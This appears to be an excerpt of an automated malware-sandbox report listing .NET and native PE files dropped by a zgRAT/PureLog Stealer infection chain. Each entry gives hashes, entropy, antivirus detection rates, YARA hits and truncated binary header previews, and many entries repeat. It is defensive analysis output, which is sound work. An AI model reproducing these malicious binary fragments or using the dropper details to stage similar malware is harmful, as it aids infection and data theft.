                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):23552
                                                                                                                                                                                                    Entropy (8bit):5.519109060441589
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):32256
                                                                                                                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):23552
                                                                                                                                                                                                    Entropy (8bit):5.519109060441589
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):32256
                                                                                                                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):69632
                                                                                                                                                                                                    Entropy (8bit):5.932541123129161
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                    Entropy (8bit):5.645950918301459
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                                                    MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                                                    SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                                                    SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                                                    SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):85504
                                                                                                                                                                                                    Entropy (8bit):5.8769270258874755
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):32256
                                                                                                                                                                                                    Entropy (8bit):5.631194486392901
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Edge\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):69632
                                                                                                                                                                                                    Entropy (8bit):5.932541123129161
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):69632
                                                                                                                                                                                                    Entropy (8bit):5.932541123129161
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):69632
                                                                                                                                                                                                    Entropy (8bit):5.932541123129161
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                                                    Process:C:\Windows\System32\curl.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2284739
                                                                                                                                                                                                    Entropy (8bit):7.490456730492454
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24576:2TbBv5rUyXVRCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKY:IBJ1LLvax4Gmhscse1D
                                                                                                                                                                                                    MD5:C85ABE0E8C3C4D4C5044AEF6422B8218
                                                                                                                                                                                                    SHA1:F9A4DACEBF1DD80F54DA8C8AFE1DEDDAC99D381D
                                                                                                                                                                                                    SHA-256:7C388F4215D04EEA63A7D5BD9F3CADE715F285EA72DE0E43192FC9F34BAF7C52
                                                                                                                                                                                                    SHA-512:082F4924C624D9B35DFF185B582278E032D3FF230E48739D796BBA250B0807C498EF1B52F78B864AADB35DB0F65463035110C02B7D92DE4FB0A86902CCAD7CB5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Windows\System32\curl.exe
                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):370176
                                                                                                                                                                                                    Entropy (8bit):7.990824056166435
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:6144:uFEE0IJwfawOmaDOEFI2FSCsPOjygLxkxweCyxORzX7rIh0uUWJZtwCiDMf+egqx:uFElvH+KEFLSvVAL7rqDtAIfiq4
                                                                                                                                                                                                    MD5:D6EDF37D68DA356237AE14270B3C7A1A
                                                                                                                                                                                                    SHA1:37FCDB2A0FB6949E710A7E64E181993FD4CBCB29
                                                                                                                                                                                                    SHA-256:D5F6F3242C601E85EEDFF04CD45947F7890E908E51C57F90521EED59C8088B4B
                                                                                                                                                                                                    SHA-512:01CE470A7D19FB9E139C038FF5DD30B6D85409A87B298AE9D3106B5E2EF8712C0D7FC7E4587886DEE47DB040033B9D2D591A0CAFC0001461A0DC07338F0BAA21
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W.f................................. ........@.. ....................................`.................................l...O...................................4................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......p................................................................9m.[...{....V._A.._..X..[m.'..#Q.......[..+H.<..fZ..|.....m&......y..;KR....7..S..k.m?.8..ID&.!0%N!\.\..L^...0\.....j|.M.........M.;.*.q..UO..!'..%. d.E.u......Q-w.$I...X...0d......f.$|(.gE.N...3.J..*T.?.q..\.yX:..W6...t..d.......(.E..n..K.J050....=I3-.x.p.......&{#.,..Vxb.G\.=$...}.C.fgl..`.I.yZ..?.$.'J)....K..............TV.@,...r..q....+....2<ILOS....n<..o.T.~.d:... ..z.>...._.H...
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1224
                                                                                                                                                                                                    Entropy (8bit):4.435108676655666
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4608
                                                                                                                                                                                                    Entropy (8bit):3.9733005597854265
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:6hpIaPt32M7Jt8Bs3FJsdcV4MKe27iuwUVvqBHyOulajfqXSfbNtm:paPVPc+Vx9MnVvkccjRzNt
                                                                                                                                                                                                    MD5:904849B4C1313623C1FC5BA0D84C716A
                                                                                                                                                                                                    SHA1:951188CD93D9C0622BC3F4AAFF2C39EC4308BFF4
                                                                                                                                                                                                    SHA-256:E914AE7CC2338A6C1A9BAA3A896DBFFD8AB4F5CB928222C4A154D451CF34622D
